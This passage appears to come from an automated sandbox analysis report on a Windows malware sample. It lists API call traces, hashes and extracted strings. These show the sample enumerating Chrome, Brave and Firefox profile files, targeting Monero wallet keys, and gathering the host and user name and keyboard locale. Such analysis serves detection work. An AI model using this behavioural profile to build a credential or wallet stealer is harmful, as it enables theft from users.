                                 • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$AllocCurrentExitNumaVirtual
                                • String ID:
                                • API String ID: 1103761159-0
                                • Opcode ID: e86ad2344097af7dbbcc7aaecae2fa82eb3ee2dac90205f9c37d241d14b668b9
                                • Instruction ID: a47a99a9f603b438b4e32d1a064a6a65cffab5828dcf2b3c2e045da3c7da6f23
                                • Opcode Fuzzy Hash: e86ad2344097af7dbbcc7aaecae2fa82eb3ee2dac90205f9c37d241d14b668b9
                                • Instruction Fuzzy Hash: 2CE0E67098530CFBE7506BA0AC0EF4D76BCBF04B05F104154F709761D0D6B52A419B99
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 000810B3
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 000810F7
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                 • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocFree
                                • String ID:
                                • API String ID: 2087232378-0
                                • Opcode ID: 4be79213e06cbb8912737c47ca2827ce441d176e441a5e1e3777b3f0415a02bd
                                • Instruction ID: f62d1edb28f9359dc8e6204123d76ed47eb8a4eda47d5d6347a24f6fe8c715dd
                                • Opcode Fuzzy Hash: 4be79213e06cbb8912737c47ca2827ce441d176e441a5e1e3777b3f0415a02bd
                                • Instruction Fuzzy Hash: 4BF0E271641208BBEB14ABA8AC4DFEEB7ECE705B15F300548F544E3280D5729E00DBA0
                                APIs
                                  • Part of subcall function 000978E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00097910
                                  • Part of subcall function 000978E0: RtlAllocateHeap.NTDLL(00000000), ref: 00097917
                                  • Part of subcall function 000978E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0009792F
                                  • Part of subcall function 00097850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000811B7), ref: 00097880
                                  • Part of subcall function 00097850: RtlAllocateHeap.NTDLL(00000000), ref: 00097887
                                  • Part of subcall function 00097850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0009789F
                                • ExitProcess.KERNEL32 ref: 000811C6
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                 • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Process$AllocateName$ComputerExitUser
                                • String ID:
                                • API String ID: 3550813701-0
                                • Opcode ID: 0e0f5a116930367f754f5aa5e12448f73e73587bb73fdde90d1908d56cc693bc
                                • Instruction ID: 6714c892f37c5318c3fd1beaa6b26343532c1a0627e89f3d8b937a5799d27840
                                • Opcode Fuzzy Hash: 0e0f5a116930367f754f5aa5e12448f73e73587bb73fdde90d1908d56cc693bc
                                • Instruction Fuzzy Hash: CAE0ECB696420552DE0073B0BC0EFAA329C6B15349F044425BA09D2203FE25E80196AA
                                APIs
                                • wsprintfA.USER32 ref: 000938CC
                                • FindFirstFileA.KERNEL32(?,?), ref: 000938E3
                                • lstrcat.KERNEL32(?,?), ref: 00093935
                                • StrCmpCA.SHLWAPI(?,000A0F70), ref: 00093947
                                • StrCmpCA.SHLWAPI(?,000A0F74), ref: 0009395D
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00093C67
                                • FindClose.KERNEL32(000000FF), ref: 00093C7C
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                • API String ID: 1125553467-2524465048
                                • Opcode ID: c1fa08334285ac62e297faf4e98e9c1fd797fe1c28827dbc4cb3e2c51c29f3d5
                                • Instruction ID: 6b8b351409bf9321cee3fcb139284c14329804460de1aff4aca52e2363f27117
                                • Opcode Fuzzy Hash: c1fa08334285ac62e297faf4e98e9c1fd797fe1c28827dbc4cb3e2c51c29f3d5
                                • Instruction Fuzzy Hash: 8DA13EB1A0021C9BDF24DBA4DC89FEE73B9BF49304F044598B64D96141EB759B84CFA2
                                APIs
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                  • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                  • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                  • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                  • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                  • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                • FindFirstFileA.KERNEL32(00000000,?,000A0B32,000A0B2B,00000000,?,?,?,000A13F4,000A0B2A), ref: 0008BEF5
                                • StrCmpCA.SHLWAPI(?,000A13F8), ref: 0008BF4D
                                • StrCmpCA.SHLWAPI(?,000A13FC), ref: 0008BF63
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0008C7BF
                                • FindClose.KERNEL32(000000FF), ref: 0008C7D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                • API String ID: 3334442632-726946144
                                • Opcode ID: a17d1c421f1a9e76dc878f80d408e4a2a4655da024be185a70879c6ffe955240
                                • Instruction ID: 9fc96193a4b98e883a33197d564350c3ef2476bb4b703228bb949bc5950da0dd
                                • Opcode Fuzzy Hash: a17d1c421f1a9e76dc878f80d408e4a2a4655da024be185a70879c6ffe955240
                                • Instruction Fuzzy Hash: A5425172A10108ABDF14FBB0DD96EEE737DAF45300F404558B90A96192EF349B49DBE2
                                APIs
                                • wsprintfA.USER32 ref: 0009492C
                                • FindFirstFileA.KERNEL32(?,?), ref: 00094943
                                • StrCmpCA.SHLWAPI(?,000A0FDC), ref: 00094971
                                • StrCmpCA.SHLWAPI(?,000A0FE0), ref: 00094987
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00094B7D
                                • FindClose.KERNEL32(000000FF), ref: 00094B92
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s$%s\%s$%s\*
                                • API String ID: 180737720-445461498
                                • Opcode ID: 1c53e8fcda11bdd429df30ce2640c2524bebf9b8395d8f60b7d2944f64576414
                                • Instruction ID: 06d51822cb6b53465f5aed4d2a406f584295bb902355df0c62769b0c78fc268d
                                • Opcode Fuzzy Hash: 1c53e8fcda11bdd429df30ce2640c2524bebf9b8395d8f60b7d2944f64576414
                                • Instruction Fuzzy Hash: 656136B190021CABCF24EBA0EC49FEA73BCBB49705F048698F64996141EB75DB45CF91
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00094580
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00094587
                                • wsprintfA.USER32 ref: 000945A6
                                • FindFirstFileA.KERNEL32(?,?), ref: 000945BD
                                • StrCmpCA.SHLWAPI(?,000A0FC4), ref: 000945EB
                                • StrCmpCA.SHLWAPI(?,000A0FC8), ref: 00094601
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0009468B
                                • FindClose.KERNEL32(000000FF), ref: 000946A0
                                • lstrcat.KERNEL32(?,00D0F348), ref: 000946C5
                                • lstrcat.KERNEL32(?,00D0DFC8), ref: 000946D8
                                • lstrlen.KERNEL32(?), ref: 000946E5
                                • lstrlen.KERNEL32(?), ref: 000946F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                • String ID: %s\%s$%s\*
                                • API String ID: 671575355-2848263008
                                • Opcode ID: a11ce234c09430b4d1a744189129c460237a473bd51d625fde2416f847a0941a
                                • Instruction ID: 236c7cb73e8e8414d04ecd1eab507886a7db401ed5eba9bde5cbf111871371ac
                                • Opcode Fuzzy Hash: a11ce234c09430b4d1a744189129c460237a473bd51d625fde2416f847a0941a
                                • Instruction Fuzzy Hash: 555153B194021C9BCB60EBB0EC89FED737CBB58304F404598F64996191EB759B858F92
                                APIs
                                • wsprintfA.USER32 ref: 00093EC3
                                • FindFirstFileA.KERNEL32(?,?), ref: 00093EDA
                                • StrCmpCA.SHLWAPI(?,000A0FAC), ref: 00093F08
                                • StrCmpCA.SHLWAPI(?,000A0FB0), ref: 00093F1E
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0009406C
                                • FindClose.KERNEL32(000000FF), ref: 00094081
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s
                                • API String ID: 180737720-4073750446
                                • Opcode ID: 9f0d0db778eac9e3ba04acc3d0aee3cf8ccd9e56ff1481169b0c828ba58dbceb
                                • Instruction ID: 024379edb624e2249a6fb273a68818aa239a949ba7fc5f15b34161cf8a36e278
                                • Opcode Fuzzy Hash: 9f0d0db778eac9e3ba04acc3d0aee3cf8ccd9e56ff1481169b0c828ba58dbceb
                                • Instruction Fuzzy Hash: DA5145B290021CABCF24FBB0DC89EEA737CBB48304F448598F65996141DB759B89DF91
                                APIs
                                • wsprintfA.USER32 ref: 0008ED3E
                                • FindFirstFileA.KERNEL32(?,?), ref: 0008ED55
                                • StrCmpCA.SHLWAPI(?,000A1538), ref: 0008EDAB
                                • StrCmpCA.SHLWAPI(?,000A153C), ref: 0008EDC1
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0008F2AE
                                • FindClose.KERNEL32(000000FF), ref: 0008F2C3
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\*.*
                                • API String ID: 180737720-1013718255
                                • Opcode ID: 2790134075c3cb5cfecde7754bea0c230976e482b140a22285a1fb1cd371cd2f
                                • Instruction ID: e47a9560e908060eee7d60334693630180b6ab3e19a9b81e108ebefa5adf73b7
                                • Opcode Fuzzy Hash: 2790134075c3cb5cfecde7754bea0c230976e482b140a22285a1fb1cd371cd2f
                                • Instruction Fuzzy Hash: D4E1BF72A111189ADF54FB60DC56EEE7378AF55300F4041A9B50A66093EF306F8ADFA2
                                APIs
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                  • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                  • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                  • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                  • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                  • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,000A15B8,000A0D96), ref: 0008F71E
                                • StrCmpCA.SHLWAPI(?,000A15BC), ref: 0008F76F
                                • StrCmpCA.SHLWAPI(?,000A15C0), ref: 0008F785
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0008FAB1
                                • FindClose.KERNEL32(000000FF), ref: 0008FAC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: prefs.js
                                • API String ID: 3334442632-3783873740
                                • Opcode ID: 27f4b312e8c3a04feb544f72ef8df6af29fdfcc9b5510505a1ab0b2f409fd250
                                • Instruction ID: 7a4cb63954ac0fd97b0ae3ce13ad8a996de632e33909f512e23be2b31ee8c147
                                • Opcode Fuzzy Hash: 27f4b312e8c3a04feb544f72ef8df6af29fdfcc9b5510505a1ab0b2f409fd250
                                • Instruction Fuzzy Hash: 0EB14F71A101189BDF24FF70DC96EEE7379BF55300F4081A8A54A9A192EF306B49DBD2
                                APIs
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,000A510C,?,?,?,000A51B4,?,?,00000000,?,00000000), ref: 00081923
                                • StrCmpCA.SHLWAPI(?,000A525C), ref: 00081973
                                • StrCmpCA.SHLWAPI(?,000A5304), ref: 00081989
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00081D40
                                • DeleteFileA.KERNEL32(00000000), ref: 00081DCA
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00081E20
                                • FindClose.KERNEL32(000000FF), ref: 00081E32
                                  • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                  • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                  • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                  • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                  • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 1415058207-1173974218
                                APIs
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                  • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                  • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                  • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,000A0C2E), ref: 0008DE5E
                                • StrCmpCA.SHLWAPI(?,000A14C8), ref: 0008DEAE
                                • StrCmpCA.SHLWAPI(?,000A14CC), ref: 0008DEC4
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0008E3E0
                                • FindClose.KERNEL32(000000FF), ref: 0008E3F2
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                • String ID: \*.*
                                • API String ID: 2325840235-1173974218
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: u_$ r4g$(kx$7w$7w$;'7$Xl[$d:k'$e#$sw
                                • API String ID: 0-1729287021
                                APIs
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                  • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                  • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                  • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                  • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                  • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,000A14B0,000A0C2A), ref: 0008DAEB
                                • StrCmpCA.SHLWAPI(?,000A14B4), ref: 0008DB33
                                • StrCmpCA.SHLWAPI(?,000A14B8), ref: 0008DB49
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0008DDCC
                                • FindClose.KERNEL32(000000FF), ref: 0008DDDE
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID:
                                • API String ID: 3334442632-0
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: oU$6f~$3tV$4<GF$5p$Yq=$*]=$?~{$f\
                                • API String ID: 0-3202645899
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ,Qz$7Ro=$:}}7$R]oa$S1k$YK\$d3,?$d3,?
                                • API String ID: 0-3914816958
                                APIs
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                • GetKeyboardLayoutList.USER32(00000000,00000000,000A05AF), ref: 00097BE1
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00097BF9
                                • GetKeyboardLayoutList.USER32(?,00000000), ref: 00097C0D
                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00097C62
                                • LocalFree.KERNEL32(00000000), ref: 00097D22
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                • String ID: /
                                • API String ID: 3090951853-4001269591
                                APIs
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                  • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                  • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                  • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                  • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                  • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,000A0D73), ref: 0008E4A2
                                • StrCmpCA.SHLWAPI(?,000A14F8), ref: 0008E4F2
                                • StrCmpCA.SHLWAPI(?,000A14FC), ref: 0008E508
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0008EBDF
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 433455689-1173974218
                                APIs
                                • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0008C871
                                • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0008C87C
                                • lstrcat.KERNEL32(?,000A0B46), ref: 0008C943
                                • lstrcat.KERNEL32(?,000A0B47), ref: 0008C957
                                • lstrcat.KERNEL32(?,000A0B4E), ref: 0008C978
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$BinaryCryptStringlstrlen
                                • String ID:
                                • API String ID: 189259977-0
                                • Opcode ID: 33f869ee3c16ba549bbbc322e85b7dcd84456890d020b74584f5688d3d7f93b0
                                • Instruction ID: b8d62a99604e1fc8505981b4efffdf2f7ebd408aeca9b5dfe29f4047113e368d
                                • Opcode Fuzzy Hash: 33f869ee3c16ba549bbbc322e85b7dcd84456890d020b74584f5688d3d7f93b0
                                • Instruction Fuzzy Hash: 12415D7591421EDBDB10DFA4DD8DFEEB7B8BB48704F1041A8E509A6280D7705A84CFA1
                                APIs
                                • GetSystemTime.KERNEL32(?), ref: 0009696C
                                • sscanf.NTDLL ref: 00096999
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 000969B2
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 000969C0
                                • ExitProcess.KERNEL32 ref: 000969DA
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                 • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Time$System$File$ExitProcesssscanf
                                • String ID:
                                • API String ID: 2533653975-0
                                • Opcode ID: e08513a433fbdb050d94e147d75e71f92704544db75523194b8c635db61074a2
                                • Instruction ID: 553691634105c9edbc89f06f25b3688f270dd69b7f57c09778d9b8ef7790c18a
